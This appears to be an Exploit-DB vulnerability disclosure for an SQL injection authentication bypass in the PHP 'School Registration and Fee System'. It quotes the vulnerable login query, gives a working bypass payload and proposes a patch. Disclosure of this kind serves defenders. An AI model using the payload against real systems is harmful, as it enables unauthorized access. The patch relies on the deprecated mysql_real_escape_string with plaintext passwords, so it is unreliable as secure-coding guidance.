School Registration and Fee System Auth Bypass

vendor:

School Registration and Fee System

by:

opt1lc

7,5

CVSS

HIGH

Authentication Bypass

CWE

Product Name: School Registration and Fee System

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: XAMPP

2016

School Registration and Fee System Auth Bypass

The vulnerability exists due to insufficient sanitization of user-supplied input in 'username' and 'password' parameters of 'login.php' script. A remote attacker can bypass authentication and gain access to the application.

Mitigation:

The vulnerability can be mitigated by using the mysql_real_escape_string() function to sanitize user-supplied input.

Source

Exploit-DB raw data:

# Exploit Title.............. School Registration and Fee System Auth Bypass
# Google Dork................ N/A
# Date....................... 01/11/2016
# Exploit Author............. opt1lc
# Vendor Homepage............ http://www.sourcecodester.com/php/10932/school-registration-and-fee-system.html
# Software Link.............. http://www.sourcecodester.com/sites/default/files/download/hemedy99/bilal_final.zip
# Version.................... N/A
# Tested on.................. XAMPP
# CVE........................ N/A

# File....................... bilal_final/login.php
---------------------------------------------------

		----snip----

		$username = $_POST['username'];
		$password = $_POST['password'];
		/* student */
		$query = "SELECT * FROM users WHERE username='$username' AND password='$password'";
		$result = mysql_query($query)or die(mysql_error());
		$row = mysql_fetch_array($result);
		----snip----

---------------------------------------------------

Exploit 
-------
You can login with username and password : administrator' or '1'='1 


Patching
-------
You can use one of function in PHP : mysql_real_escape_string() to 
---------------------------------------------------

		----snip----

		$username = mysql_real_escape_string($_POST['username']);
		$password = mysql_real_escape_string($_POST['password']);
		/* student */
		$query = "SELECT * FROM users WHERE username='$username' AND password='$password'";
		$result = mysql_query($query)or die(mysql_error());
		$row = mysql_fetch_array($result);
		----snip----

---------------------------------------------------

Credit
-------
This vulnerability was discovered and researched by opt1lc

Shout
-------
My Beautiful Daughter & My Wife

Reference
-------
http://php.net/manual/en/function.mysql-real-escape-string.php